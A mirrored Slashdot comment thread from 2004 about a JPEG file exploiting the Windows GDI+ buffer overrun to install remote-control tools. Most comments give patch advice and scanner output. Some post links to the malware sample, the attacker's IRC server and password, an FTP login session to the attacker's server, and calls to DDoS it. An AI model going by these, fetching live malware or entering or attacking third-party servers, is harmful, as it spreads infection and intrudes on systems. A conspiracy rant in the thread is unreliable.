Slashdot Mirror
First JPEG Virus Posted To Usenet
Shawn writes "This could possibly be the worst viruses yet! Earlier this month Microsoft announced a problem in their GDI driver that processes the way JPEG images are displayed. Someone has finally posted an exploit to Usenet. Easynews, a premium Usenet provider, found the virus Sunday afternoon. Up-to-date information about how we found it and what it does is located at www.easynews.com/virus.txt. When this picture is viewed it installs remote management software (winvnc and radmin) and will connect to irc."
I want to see what GraphicConverter does with this.
One more reason not to look at that goatse picture!
I think I speak best when I say......
Pwnd
Usenet posts JPEG viruses to you!
Congrats, microsoft, for making just about every filetype unsafe.
The worst part is that you don't even need to be using IE. Hopefully mozilla decodes the jpgs itself before rendering them on windows.
autopr0n is like, down and stuff.
Hopefully not too many people get hit by this...
Meanwhile, I'm just happy I don't run windows at home!!
This exploit could also be used by inserting the code into certain applications that render JPEG images while running. Also, email worms that have JPEG images attached with the code could cause mass havoc. Glad im on OSX!
gShares.net
-------
artlu.net
Here we go again... Hold on... woooooowww. :)
I hope I'm safe enough by not using many Microsoft apps, but I'm not sure about that. Sucks.
It's better to vote for what you want and not get it than to vote for what you don't want and get it.
- E. Debs
Update your systems now! The patch has been out for several weeks. I have already applied it to my corporation via SUS (which is free) and am rolling out the office patch now, as well. There is no reason other than laziness or sysadmin ignorance for this to be another massive virus attack.
www.goatse.cx
Someone tell me, thats not a virus, is it?
This sort of thing ushers in a new era of exploitation in which the warnings of security professionals in the past have been proven dreadfully wrong. Only the bearded terminal hackers are invulnerable to this one, typing away at their command lines being all, "What JPGS?". No longer can we simply give advice on security based on our assumptions as to what is possible and what is not. We must pay the piper and actually consider attack vectors that have formerly not been feasible.
I wish Snort had intrusion prevention capability. = wink wink=
Does this affect Firefox?
It was only a matter of time. Now we wait for a dozen variants to pop up.
"This could possibly be the worst viruses yet!"
Hm...maybe when he started typing there was only one and it spread during the sentence?
GOD SAVE THE PR0N :)
I guess those nude pictures of Anna Kournikova could indeed be a virus.
Virus writers should be dragged out in the street and... well, whatever.
The only reason we need security for this crap is because the viruses exist. Which means that we only have security when the need arises. If the vulnerability exists but is never exploited, it tends to sit open and unpatched. As soon as this pops up, we see vendors frantically patching systems.
I usually call it like I see it - which means defending the bad guys when they deserve it. But in this case, there's no doubt that open source has major advantages. The vulnerability has been identified, people are complaining that it's not being fixed... I bet it takes a virus to get MS (and others) moving to fix it.
What browsers are protected from the jpeg virus? I remember IE and some earlier versions of Mozilla being said to be vulnerable to this. This could be my incentive to upgrade Firedragon, or whatever they call it these days.
We all live in a #FFFF00 submarine...
If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.
Interested in open source engine management for your Subaru?
Thats a feature (connecting to irc) not a virus
clamscan possibleVirus.jpg
possibleVirus.jpg: Exploit.JPEG.Comment FOUND
----------- SCAN SUMMARY -----------
Known viruses: 24607
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
I/O buffer size: 131072 bytes
Time: 0.501 sec (0 m 0 s)
also updated nav corp 8 with latest defs (9/27/04) and it found it. AVG free edition doesnt as of yet.
Lawyers, MBA's, RIAA? A jedi fears not these things!
I run at work.
:)
The joys of running a mac shop
Microsoft was released a *FREE* patch for customers, now available from their web site!
your neighbors open accesspoint, a copy of Airpwn and a suitably infected jpeg. Sounds like a pretty nasty situation in the making to me.
www.linux-skunkworks.com
No Screenshots, please!
Tell the truth and you won't have so much to remember.
My 12 year old Amiga 3000 is immune!
Ok, no offense, but beanie-babies and erotica? There are some newsgroups that just shouldn't exist.
Foregone conclusion then.
There goes the neighborhood.
These could be the worst grammar too!!!
If you read through the actual posting, it is apparent that this while may be the first GDI/JPEG-based worm, but it is certainly not going to be the worst. First of all, unless I missed it- this code does not even self-replicate (i.e.- it doesnt mail itself to others, or post itself to usenet, or otherwise exploit vulnerable systems) I would expect to see some script kiddies combine this proof of concept trojan with some social engineering type email worms, and then t**THAT** will be a nasty worm.
Unprotected goatse.cx viewing can make you catch something nasty.
yes, if you haven't updated to the latest version.
See this Slashdot thread.
- Leo
You don't use science to show that you're right, you use science to become right.
put the image on doubleclick.net
Real Player and that piece of crap spyware that Dell calls a media player just blithely tried to open the file without performing any integrity checks whatsoever, and damn near crashed the system.
I bet this sort of thing is a helluva lot more endemic than people realize.
If you are using Windoze, run ZoneAlarm from ;^)
ZoneLabs. Every program that tries to access
the internet in any way has to pass through
this program and be okayed by you! Just click
DENY and REMEMBER THIS SETTING. The software
will still be installed but it can't get back
to the LOSER who released it!
server: irc.p2pchat.net
:) (and watch the bots join up)
channel: #FurQ
passowrd: letmein
Nice little informal gathering to talk about the virus
apparently, the text indicates, that's the only source for the installed files.
if say, 500 of us were to log into that and stay connected, would we stop the virus? would there be any risk to ourselves? (giving your IP away for a start).
This is my Sig, this is my Gun. One is for Slashdot and one is for Fun.
Our university campus has a huge problem with viruses and this is another exciting addition to our collection. I'm sure I'll start seeing on plenty of guy's asking for help getting this removed, after finding out pornstars aren't virus free after all.
Thankfully, though, this shouldn't cause as much trouble as our current crop of worms. I'm shocked at how dumb our users are, as a whole. We're still having people infected with blaster, over a year after Microsoft patched that vulnerability! Sasser is absolutely rampant. The school even purchased a blanket liscence of Norton, but I would bet less than half of the students have installed it. We have a T3 line providing our outside connection, and it's currently averaging about 7 Mbps combined up/down, because the internal network, which is mostly linked from buidling to building by gigabit fiber, is saturated by virus crap. Although this virus may have a really effective way of spreading, it scares me very little.
Now i can go exploiting people! Thx for the virus easynews! http://easynews.com/virus/virus-jpeg.zip
There's no Freedom like UFP-dom
Come on... admit it you've all been dying for this slashdot posting. You didn't think all this hype about the microsoft GDI thing wasn't going to pay off? Well there you go.... feast on microsofts pain....
As stated in Re:That's pretty amazing. (a few posts up) it does not -- since Firefox is the latest Mozilla-based browser.
Anyone know if this exploit can be done when the user is using a Windows Limited account?
I suggest you people hold your tongues, and think before you blindly bash Microsoft all the time. Yes, there *ARE* OTHER good reasons to hate Microsoft, but that's beside the point, and I'd rather not get into that right now.
For the purposes of this discussion, suffice it to say that I think *BOTH* the Microsoft and open source communities have their fair share of exploits to deal with. For example, the Mozilla people have had to patch things like this before, too. In fact, need I also point out that a very similar potential exploit was also found recently in GdkPixBuf. So it ISN'T just Microsoft.
Before now, many of you were saying "we don't have as many exploits as Microsoft." Then finally, when similar exploits are found in open source, you people start rationalizing, and saying "Oh, okay, but our side still fixes things faster." That's what in logic we call "rationalization," and "shifting your reasons." I also bet that some of these same people also think our President is doing this on the reasons for invading Iraq (though please note I still support the President, though that's also beside the point.)
Saying "but open source allows people to see them more quickly, too" is also no argument. Certainly, one could say open source allows for greater transparency in the process, but on the other hand, I could also legitimately argue that allowing everyone to look for possible exploits in my code is like posting the blueprints for all my locks right out in the open, so every burglar can then look for ways to try to pick them or break them.
My point is basically this: I wish people would stop going to extremes, bashing Microsoft when any kind of security flaw hits, then trying to rationalize and talk down every similar flaw that is found in their favorite open source project.
I don't see any indication that it's a virus at all. Just that the jpeg installs remote admin tools, connects to IRC and other typical things.
How does it propagate?
Is is just me, or does the phrase "JPEG virus" not accurately describe where the vulnerability lies. This seems to me like it should be called a "MIcrosoft Windows virus".
Then again, perhaps prepending "Microsoft Windows" to "virus" is considered redundant.
FYI, here's the fix from M$ for this exploit: Security Bulletin
It is very hard to get in right now. I've set FlashFXP to retry 1,000 times every 15 seconds. We'll see how that goes.
The more of us that keep this connection tied up doing innocent things for the next 48 hours, the better.
There really needs to be a distributed DDOS for spammer sites, virus sites, etc. Use The Force for good, I say.
Lose Weight and Feel Great with Isagenix
Hey! Any good programmer out there could just modify this virus so that it doesn't do anything "wrong"? I wanted it to change the windows desktop picture to an image I'd post on my website that would read "Patch your system ASAP! You're owned!" (or any other 1337 h4x0r cliché). I'd post the infected file on my blog and wait for my friends to call me in fear that something worse could have hapenned, hehehehe!
Can somebody explain how this affects me? How can a picture be a virus? It's looks like Notepad opening readme.txt and formatting your hard drive. And what viewers and browsers can do it? If I save it an doubleclick from the desktop explorer? Is it a picture or a viewer problem? If I use an old version of a broswer or 95 OS will it still create problems? If I use a firewall like ZA will that stop it? Anytime I see these virus problems I never know. Of course whenever I do check my comp for problems with both an AV and spyware blocker it finds nothing. Of course I don't download willy-nilly.
Why don't you guys have friends or journals?
Why can't it just nuke the hard drive like the old virii did? Teach people a little about access levels and system patching.
[Since it seems to me it might be good for us all to collect as much information as possible in this thread ...]
PS: just for the hell of it, on a box that's not using one of the allegedly vulnerable versions of Windows or IE (it's NTWS SP6a, IE5.5), I tried to open the Easynews sample image using Irfanview V3.80, which displayed the error message :
I suppose I'd better run a full scan of my peecee anyway now ... sigh ... I wonder which JPEG library Irfanview uses ...
Although the SANS website says their scanner is written for Win2K+, it seems to run on NT (although the output format is a bit screwy), and it reckoned there is one vulnerable DLL, at
Dunno where that came from, but it describes itself as "Microsoft Vector Graphics Rendering(VML)", and - fascinatingly - the copyright says "Unpublished work. Copyright© Microsoft Corporation 1983-1999. All rights reserved."If you don't pray in my school, I won't think in your church.
Not in these parts...
Why doesn't slashdot allow you to post images! :)
Does this mean all those lonely college bachelors have to stop downloading porn until MS patches the hole?
Wasn't iLoveYou the worst virus ever? Or Stages? Or Melissa? Or Nimda? Or the "Good Times" virus? This one will fall into obscurity, too.
Use Evolution instead of Outlook? Bewa
Further proof that secure computing is not a firewall enabled by default. Secure computing is a well rounded aproach. Design, code, implementation, and patching. And thats just the OS part, not the people part.
Victory is gained, not in knowing your opponents next move, but in preempting them.
... I don't use Windows at home or at work.
Serves Windows users right for using Windows.
One more reason to use Linux!
I remember a web page once that had HTML that was known to crash certain versions of Internet Explorer. Some kind of buffer overflow diddling via HTML couldn't be that far off. Declarative protocols can clearly be full of holes also, not just executable content.
Table-ized A.I.
I'm anonymous for a reason. When I found out that this was in the wild I attempted to access the server. At first I was able to get in via FTP. I threw a couple of commands at the system, it responded but before I could explore enough to find out who was behind this the server logged me off and the password referred to in the text file from EasyNews stopped working.
DAMN.
Next time bitches, I will 0wn you!
Just out of curiosity, does anyone know if x86 no-execute protection(the NX bit, aka the XD bit, aka Data Execution Protection) prevents against this? With the release of SP2 and DEP support, it would seem that this would be a good test to see if DEP is all its cracked up to be.
What, now you can't even WATCH sex without protection?
In my day, an article like this would have been a downright joke. Seriously, this is such a milestone that I'm filing the article in my permanent news archives.
In retrospect I don't know why we thought such a thing was impossible for so long? After all, buffer overflows or other coding problems can result in malicious code executing. I guess what we didn't expect "back then" was that computers primarily engaged in networking activities would be running vital parsers - HTML, ActiveX, images etc - within the operating system itself, with administrator level privileges.
Wouldn't it make sense to limit the scope of any kind of modular parser/crypto using privilege isolation, so that even if malicious code starts running it is utterly incapable of affecting anything else?
i.e. shouldn't all such modules - crypto, image, parser run within some kind of privilege jails and communicate with the involved application using something like a socket? Hell, couldn't Windows do just that and wrap it up so API users don't notice? What am I missing here? I'm not picking on Windows here, same thing could be done on *NIX.
I had a look at the sample source code, and it's dated (f you can believe it) September 23 (ie 5 days ago).
What's happening here - is someone bignoting themselves, is it a mistake, or has it really been around this long ?
I did upgrade to the latest version of Firefox and lost about half of my most usefull extensions. Some I found later on the homepage sites, others are yet to be upgraded.
So heres the problem with a micro-browser that is feature enhanced by extensions that you come to love and rely on. If there is a critical vunerability, do you upgrade and be safe, but lose usefull functionality, or do you risk it and wait until the extension builders catch up?
I just ran the updates on an XP machine. It claimed that there was vulnerable GDI code on the machine and I should go to the office update page. Guess what: the office update page said there were no updates. So, apparanetly the system is vulnerable, but there is no way to fix it. Wonderful!
The real "Libtards" are the Libertarians!
Once this JPEG overflowed GDI+, it phoned home ...
Will PC-based firewalls block the outbound connection?
I run AtGuard, which throws a popup anytime something makes an outbound connection. However, I have a rule to allow Firefox to make outbound connections. Would the virus run as Firefox when it strikes (in the event that I go surfing for JPGs of naked tranny beanie babies from easynews), or does it run as some system component of windows (which would be blocked since I disallow all netbios/system stuff except to self) ?
. . . of kiddy porn. The pervs grab the jpeg, load it, and it quietly calls home to the FBI, where a dot matrix printer prints out another warrant for a judge's signature . . .
One CPU cycle wasted on digital restrictions management is ONE TOO MANY.
If there's no name yet, how about the Medusa virus?
So what happens when someone hacks the ad server that cnn or google uses, and puts this jpeg up?
Millions of instant zombies.
Thats f*cking scarry....
TechNet Home Security Microsoft Security Bulletin MS04-028 Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution (833987) Issued: September 14, 2004 Updated: September 21, 2004 Version: 1.2 Summary Who should read this document: Customers who use any of the affected operating systems, affected software programs, or affected components. Impact of Vulnerability: Remote Code Execution Maximum Severity Rating: Critical Recommendation: Customers should apply the update immediately. Security Update Replacement: None Caveats: If you have installed any of the affected programs or affected components listed in this bulletin, you should install the required security update for each of the affected programs or affected components. This may require the installation of multiple security updates. See the FAQ section of this bulletin for more information. Tested Software and Security Update Download Locations:
Affected Software:
Microsoft Windows XP and Microsoft Windows XP Service Pack 1 - Download the update (KB833987) Microsoft Windows XP 64-Bit Edition Service Pack 1 - Download the update (KB833987) Microsoft Windows XP 64-Bit Edition Version 2003 - Download the update (KB833987) Microsoft Windows Server(TM) 2003 - Download the update (KB833987) Microsoft Windows Server 2003 64-Bit Edition - Download the update (KB833987) Microsoft Office XP Service Pack 3 - Download the update (KB832332) Microsoft Office XP Service Pack 2 - Download the administrative update (KB832332) Microsoft Office XP Software: Outlook® 2002 Word 2002 Excel 2002 PowerPoint® 2002 FrontPage® 2002 Publisher 2002 Access 2002 Microsoft Office 2003 Software: Outlook® 2003 Word 2003 Excel 2003 PowerPoint® 2003 FrontPage® 2003 Publisher 2003 Access 2003 InfoPath(TM) 2003 OneNote(TM) 2003 Microsoft Project 2002 (all versions) and Microsoft Project 2002 Service Pack 1 (all versions) - Download the update (KB831931) Microsoft Project 2003 (all versions) - Download the update (KB838344) Microsoft Visio 2002 Service Pack 1 (all versions) and Microsoft Visio 2002 Service Pack 2 (all versions) - Download the update (KB831932) Microsoft Visio 2003 (all versions) - Download the update (KB838345) Microsoft Visual Studio .NET 2002 - Download the update (KB830348)
Microsoft Visual Studio .NET 2002 Software:
Visual Basic .NET Standard 2002
Visual C# .NET Standard 2002
Visual C++ .NET Standard 2002
Microsoft Visual Studio .NET 2003 - Download the update (KB830348)
Microsoft Visual Studio .NET 2003 Software:
Visual Basic .NET Standard 2003
Visual C# .NET Standard 2003
Visual C++ .NET Standard 2003
Visual J# .NET Standard 2003
The Microsoft .NET Framework version 1.0 SDK Service Pack 2 - Download the update (KB867461)
Microsoft Picture It!® 2002 (all versions) - Download the update
Microsoft Greetings 2002 - Download the update
Microsoft Picture It! version 7.0 (all versions) - Download the update
Microsoft Digital Image Pro version 7.0 - Download the update
Microsoft Picture It! version 9 (all versions, including Picture It! Library) - Download the update
Microsoft Digital Image Pro version 9 - Download the update
Microsoft Digital Image Suite version 9 - Download the update
Microsoft Producer for Microsoft Office PowerPoint (all versions)
Microsoft Platform SDK Redistributable: GDI+ - Download the update
Office Users Note Office XP Service Pack 2 and Office XP Service Pack 3 are both vulnerable to this issue. However the security update for Office XP Service Pack 2 is only provided as part of the Office XP administrative security update. For more information, see the Security Update Information section. Office
It was Bug Month, not security, though that's related. It was in 2002. The shortest month, February.
... "It's time to get the garage cleaned out."
"We are not coding new code as of today for the next month," Richard Purcell, director of the Microsoft's corporate computing office
Which I thought was straight PR, and if there were any acutal deferrals of project waypoints, this time would be spent dealing with personal inbox overloads.
But I did get contacted by a Microsoft engineer during that time, re a software failure I'd detailed online. {Nothing's been fixed, mind you.}
"Quality freefall"? Not really. They've always produced third tier code. This is normal. The only difference right now is they're feeling more heat about it because programs can do more, and they've got competition they can't kill in Open Source. The profitability of their poor quality of approach is falling against these two rising variable. Quality itself has been steady state.
because i see a vulnerability in it..
... someone defaces a popular website with such an image. Imagine if someone replaced the main image on the worlds most popular search engine!
Or if someone posts such an image to an automatic image rating site (are they still popular? does hotornot still exist?)
Heard way too many horror stories about SP3 and decided not to take the chance (since SP2 killed my system and required a complete reinstall). Are there any standalone patches for SP2 available?
If the g'vt kept the data on you that google does you'd better believe you'd be calling it "doing evil"
oh that's right, those toys that were extremely popular a few years ago, that suckers^Rconsumers
were sometimes paying upwards of thousands of
dollars to get some "rare" ones.
funny how things can be a huge fad one day,
and completely forgotten the next
Does anyone remember those ANSI bombs of old? I remember BBS's had all sorts of elaborate protections against them, zipfile comments etc.
members are seeing something, your seeing an ad
This looks like it could be the worst Window virus to date. What is the easiest way block this specific code from getting through a Linux NAT/firewall?
- how can I drop any packet containing a particular sequence of bytes?
- better: how would one do it at the TCP level so you catch it even if it spans more than one packet?
I was talking with a friend on MSN... coincidentally after reading on this for about 2 hours. The first thing she said i was very suspicious: C3ly$c3 says: you there? ...http://www.xf2s.com/msn/wode.jpg.
err a jpeg surrounded by a bunch of other characters ... sounds suspicious
I dont know if this is actually the virus.... im on my laptop right now which runs windows (unpatched of course)
I don't know about AIM, but MSN reencodes all images to PNG. I don't think there's going to be much risk from that.
-ReK
md5sum -c reality.md5
reality: FAILED
md5sum: WARNING: 1 of 1 computed checksum did NOT match
Microsoft should get with google and other major internet sites and put jpegs that:
:)
1) fix the hole by downloading/installing updates
2) turn on automatic updates
for easynews...
AC
That'll fix it...
Oh well, what the hell...
I played with the sample code to crash a machine last Friday. That code produced a 2K JPEG. (Likely it was smaller but I'll bet 2K is the block size on my 80 GB hard drive. File is at work so I can't check it now.)
7K sounds very reasonable if all it has to do is download the real executables.
Technically, this is a Trojan Horse, not a virus.
is how far back IE (and Windows) is affected by this?
specifically versions and releases.
are stock 95, 98 and ME affected?
the irc channel has been slashdotted... thats new
Sorry to be nitpicky here, but this is a trojan horse, not a virus. A virus propagates through replication.
LS
There is a fine line between being a cultivated citizen and being someone else's crop. - A. J. Patrick Liszkie
That /.ers can reference generic sounding apps like GraphicConverter and Preview without mention of the operating system?
Apple really has come a long way around here, eh?
It's all pretty simple there. To install something you have to put in the admin password. Unix made easy.
The way Apple does it (by app) is FAR more intelligent than having to make a user an admin or log out of the system entirely to log in as an admin.
I have a few applications here at the school that demand admin privs. I've all but given up trying to restrict them. But as anyone who has seen the proliferation of unwanted toolbars can attest - the cost is high.
"...Well, there's egg and bacon; egg sausage and bacon; egg and spam; egg bacon and spam; egg bacon sausage and spam..."
Interesting that this virus, which has been in the wings and known of by select groups for years now, should at this time be given lots of promotion, (a few virus releases and big, loud press attention like a freekin' summer movie advertising run), right when the most important US election in the history of mankind is gearing up.
Having people scared out of the public places so that they can't discuss the events which are about to unfold. . ?
And some dorks still laugh at me and say I'm a paranoid conspiracy nut.
--Goodness! Well, if conspiracies don't exist, why are there laws like, 'Conspiracy to commit _____' on the books? And who but the lying psychos in government are better suited to pulling such stunts? Only a nut would actually lower his/her guard over the next couple of months!
Count on this: If any 'terrorism' happens in the next 5 weeks, you can be sure it will have been be aided and abetted by the US and/or Israeli secret services.
Not that you'll be able to talk about it on-line, what with all the scary viruses and all!
Buckle up, kids. This stretch of road is about to get bumpy.
-FL
Much as I despise virus writers, frankly after having been forced to use Windows for the last few days, I hope this destroys the damn platform. I normally try and keep a neutral attitude to platform wars, but these last few days have really opened my eyes to just how bad Windows is. It sucks so bad, I simply cannot fathom why it is so popular. I normally use OS X, but idiosyncracies aside, Windows designers truly seem to have no clue about what makes the difference between a productivity aid and a productivity hindrance. At every step some "feature" of Windows either doesn't work, or else does too much, requiring further steps to undo some of what it did. It cannot lay text out properly half the time. Its character mapping is totally broken, with different fonts having different character mappings. I could rant on....
Frankly, these viruses are great news for those of us who just want a bit more balance in the marketplace. I'm fed up with having to apologise for being a minority Mac user - fuck it, Macs let me get my work done, no fuss, no frustration, no stress, and no bad temper which makes me post rants to slashdot!! Windows users - piss off and call me back when your platform of "choice" is fixed. That's all.
It will trojan zillions of systems, leaving them open for all sorts of havoc.
Right before the US presidential election, a time where terrorists worldwide are feverishingly searching for a huge american backdoor. Expect DDOS against the most "important" croporate servers.
All this thanks to programmers fuckingly stupid enough to use a low-enough level language that is rife with buffer overflows and to their managers for allowing them to turn-out such sloppy products.
Hopefully this will be the straw that breaks the camel's back, and will cause massive interrogation of the "wisdom" of using Microsoft products and raise the awareness about alternatives.
Does running the apps in a non-admin account solve this problem? Only admins can install new services, right?
....it's a posting to an adult newsgroup, the kind that renders little thumbnails of nasty, farm animal love and other things that must not be mentioned here.
it has no other way of spreading. you have to be either moronically inquisitive or a seriously wacked pervert to get infected with this "virus," b/c you'd have to either click on a link taking you there (and "she-males-love-it-up-the-@$$" from alt.binaries.multimedia.erotica.transsexuals" is not a best-seller) or you must be a total sicko.
...because you never know who you're dealing with.
Bleeping Computer has a tutorial on how to use GDI Scan, offered by ISC, to find apps with the vulnerable gdiplus.dll. The tutorial can be found here:
GDI Scan Tutorial and how to fix the GDI+ JPEG Vulnerability
Either update those apps so they dont have the problem anymore, or do not use the app.
I saw a weak outgoing attempt to 209.171.43.27, but nothing came back :-(
Better role the ol' VMware snapshot back just in case.
im on my laptop right now which runs windows (unpatched of course) Of course? Uh, why?
no funny mods yet? no python fans?
Tell me again what Taco is paid for?
...at isc.sans.org (internet storm center). Do
not use the one from microsoft. It *sucks*.
Watch dshield (like a hawk). Read www.cert.org.
read "comp.risks" (usenet).
and still lose too much time..
We didn't have Clippy the paperclip in 1994...those were dark times indeed. Praise be to Microsoft, for delivering anthropomorphized office supplies unto the wretched masses!
If your behind any kind of firewall, and I know I'm saying *if*, then remote admin wont do you much good for remote connections unless you've got port 4899 open. If they are using a different port mapping in the registry file the it will conflict if you have another service running on that 'standard' port. Seem's pretty bad to install an app like remote admin for that purpose.
Why do overlook and oversee mean opposite things?
For a Windows server to run it on. Plus more for additional client access licenses. Which is fine if you've already spent that money.
For the rest of us, grab WindowsUpdate Cache. Runs on Squid, the world's most popular proxy server.
http://shit.slashdot.org/article.pl?sid=04/09/27/2 319222
damn, i want to get a free radmin and winvnc software for so long. finally i can download it from the ftp server where infected computer go download remote control app...
argh no...
Connected to 209.171.43.27.
220 Ftp server ready.
User (209.171.43.27:(none)): bawz
331 User bawz okay, need password.
Password:
421 Sorry, someone is already logged in to this account.
Login failed.
hrm being a developer who has used gdi+ before, it is not only for viewing jpegs. It does have a jpeg/gif etc viewing component to it. So just because an application uses gdiplus does not make it vulnerable. Picture viewers that depend on gdiplus (probably the built in one in winxp, word and other viewers that rely on gdiplus for jpeg viewing are vulnerable)
I'm also curious to know if this virus works on winxp sp2. Wasn't all the fuss about sp2 the NX flag to prevent executions in case of buffer overflows?
Or does this virus only target the unclean?
did you forget to take your meds?
http://lynx.browser.org/
The MSN server surely has enough bandwidth
for spamming service.
Of course, you're safe on older versions of Windows, regardless of browser, as long as you don't update IE. I knew there was a reason for adding Windows for Workgroups 3.11 to my existing setup. :)
or do you make the upgrade keep your settings, and keep the plugin format backwards compatible?
i hate pansy republicans
Google surely has the largest kiddie porn
collection on the planet. Note the thumbnail
images returned by the image search.
The workaround is to not use any programs which require graphics. Please switch to using the command prompt for all applications until a patch has been made. Edlin is the recommended editor for security minded users. Now Microsoft just needs to post documentation on how to edit microsoft word format docs via binary editing in edlin and we'll be back to normal!
MSN reencodes all images to PNG
That brings to mind the question of if the reader on the server is using a standard library that might have buffer exploits, so that you could alter the server to start feeding out PNG's with viruses (assuming a similar attack could be found in the PNG reader in windows, not sure if that's true or not).
"There is more worth loving than we have strength to love." - Brian Jay Stanley
I mean seriously. Many of today's apps can still run on Windows 95, given the right tweaks. With a dual boot of 95 and NT, I really don't see much reason to "upgrade" any further, at least in the Windows world.
Apparently some anti-virus programs catch it, but we all know that not everyone running a windows system keeps up to date spam filters. And *many* of the email programs for windows will render images, even in a preview pane. This is a huge, huge problem.
So the virus first showed up here:
b inaries.pictures.erotica.transexual,alt.binaries.p ictures.erotica.transexual.action,alt.binaries.pic tures.erotica.transsexual
:-)
Newsgroups: alt.binaries.multimedia.erotica.transsexuals,alt.
Subject: (Shemale-loves it up the ass.jpg (1/1)] [1/1] - Shemale loves it up the ass
Serves the shemale-lovers right...
Beware: In C++, your friends can see your privates!
I'm sure that *this* time, MS's major customers will demand improvements! ...in other news, Moller will finally get his SkyCar to market, cold fusion will be proven true, and all the PHB's in the world will be canned and replaced by people with a clue.
-jcr
The only title of honor that a tyrant can grant is "Enemy of the State."
From www.ijg.org. This library is very popular.
And if yes, are all application linking this library subject to the vulnerability?
If yes this will be a lot of work to update all applications.
In cyberspace nobody knows you're a cat!
It's up to the educated people to inform them then, or make the system safer. I've built several varieties of linux desktops, and for the mostpart the users have no idea what "root" is... as in the apps that need root access (Synaptic, apt scripts, etc) are run via sudo and everything else runs in the user level.
...that's a virus!
gone are my days of safe pr0n browsing....
Sure, the delivery mechanism is a little different, but this is just another of the 60,000+ Windows viruses running in the wild. Why is this news? Don't Windows inmates just check the same places and follow the same procedures every day?
--- For a good time mail uce@ftc.gov
unfortunately it's not quite that simple **points up**
If I recall there was an image handling vulnerability in Thunderbird 0.7.3. When that came to light I updated to 0.8. Unfortunately, 0.8 ships with a bug which means that in many cases, a basic POP3 email account can't be validated properly.
So... the current release of one of the flagship Free software projects doesn't work, but you can fix it by downgrading to an older version with a major vulnerability. Excellent!
I submitted a story on this problem to Slashdot but hey, who wants to discuss problems with Free stuff when there's always another cheap crack to make about Microsoft, eh?
they've added some value: wrote a script to pick up the first publically available exploit by mining their massive usenet feed. it's fair enough they should get some publicity of the "gee, these guys are switched on, they really know their usenet" type. props to them.
Surely someone could write an extension to Firefox to detect this and any other possible virii on-the-fly-as-it-is-being-loaded.
I went to a conference recently where Microsoft was explaining how to get games to behave under windows - for example don't write your save files to c:\program files and don't mess around with HKEY_LOCAL_MACHINE at runtime. There were less than ten people there, most of whom were speakers. And so I notice most games (and many other packages) require to be run with admin privileges. They still think they are writing DOS games, except with a snazzy graphics library.
yep I just updated my CA etrust scanner too and it detects it fine, to be safe i never extracted the file from the zip archive. Glad it detected it as my server relies on Etrust. Pestpatrol seems completely useless, never detects anything, maybe I should just get rid of it.
I'm just wondering how long it will take the spyware/adware people to exploit this like with one of their annoying banners. Also I expect this could also be done by the spam gangs to create more new zombies for spamming.
Anyone knows exact date of release.?
Someone has finally posted an exploit to Usenet.
Let me guess: the subject was "Good Times"?
sudo ergo sum
If you wanted to, you could login and delete the trojan files as the un/pw on that page is the guys master password for adding/downloading/deleting files
"With Microsoft, you get Windows. With Linux, you get the full house" - unknown
The GDI Scan tool from ISC reveals that after all of the latest patches for Windows and Office, I am still left with vunerable .dll files within office.
.dll dated May 2004.
x s.dlll ll ln dows.GdiPlus_65 95b64144ccf1df_1.0.0.0_x-ww_8d353f13\GdiPlus.dll
Version: 5.1.3097.0 -- Possibly vulnerable (Windows Side-By-Side DLL)P lus_65 95b64144ccf1df_1.0.10.0_x-ww_712befd8\GdiPlus.dll P lus_65 95b64144ccf1df_1.0.2600.1360_x-ww_24a2ed47\GdiPlus .dll
Further... the version of the GDI redistributable on the MSDN site still includes a vunerable version of the GDI
On this fully patched Windows XP system GDI Scan reveals the following information:
Scanning Drive C:...
C:\Program Files\Common Files\Microsoft Shared\Office10\MSO.DLL
Version: 10.0.3501.0 -- Possibly vulnerable (Under OfficeXP only)
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL
Version: 11.0.6360.0
C:\Program Files\Common Files\Microsoft Shared\VGX\vgx.dll
Version: 6.0.2800.1106 -- Possibly vulnerable (Win2K SP2 and SP3 w/IE6 SP1 only)
C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL
Version: 6.0.3264.0
C:\Program Files\Microsoft Works\GDIPLUS.DLL
Version: 5.1.3102.1360
C:\WINDOWS\$NtUninstallKB833998$\s
Version: 5.1.2600.1106 -- Possibly vulnerable (Backup for uninstall purposes)
C:\WINDOWS\$NtUninstallKB839645$\sxs.d
Version: 5.1.2600.1336 -- Possibly vulnerable (Backup for uninstall purposes)
C:\WINDOWS\system32\dllcache\sxs.dll
Version: 5.1.2600.1515
C:\WINDOWS\system32\dllcache\vgx.d
Version: 6.0.2800.1106 -- Possibly vulnerable (Win2K SP2 and SP3 w/IE6 SP1 only)
C:\WINDOWS\system32\sxs.dll
Version: 5.1.2600.1515
C:\WINDOWS\WinSxS\x86_Microsoft.Wi
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Gdi
Version: 5.1.3101.0 -- Possibly vulnerable (Windows Side-By-Side DLL)
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Gdi
Version: 5.1.3102.1360
Scan Complete.
What you can do now to limit the spread:
* Update all of your virus checkers and make sure that they are fully active (auto, not just on-demand).
* Disable images in your email applications, just use text only.
* Switch your primary browser to Firefox or another browser whose latest version is immune from this specific attack. If you have to still use IE, then do so only for sites you truly trust.
It looks like Microsoft have always knew this exploit existed from at least IE version 4. If you look carefully, you'll see they even implemented a fix for it;
M$ Internet Explorer -> Tools Menu Option -> Internet Options... -> Advanced Tab -> Mulitmedia -> Show Pictures Check Box
JE.
Just click on this link:
;-)
http://www.easynews.com/virus.jpg
[Please type your sig here.]
What's the world coming to when a man can't even trust his primary source of illegally and anonymously redistributed leeched fetish porn?
These people make me sick.
* Eye of Gnome seemed to work okay, but I got all sorts of weird redraw problems when I tried to resize the window.
* Gimp (2.1) says the JPEG is unsupported and couldn't be imported by the filter, then segfaults.
* Konqueror seems to work okay, but just shows a tall black rectangle, and its spinner is still chugging away, as if it's still busy loading something.
* Firefox 0.9.3 has no troubles at all; it just shows a nice white rectangle on a white background
These programs are not vulnerable to the the exploit in the same way that Windows machines are vulnerable. In fact, the issues you saw appear to be in no way related to the intended result of the virus. GIMP's segfault seems to be the most serious of these, and it is still a minor problem. I believe all of your results can be achieved by opening a mangled/corrupted
Nutshell: One cannot conclude that graphics-related processes/apps on Linux machines are vulnerable to this virus.
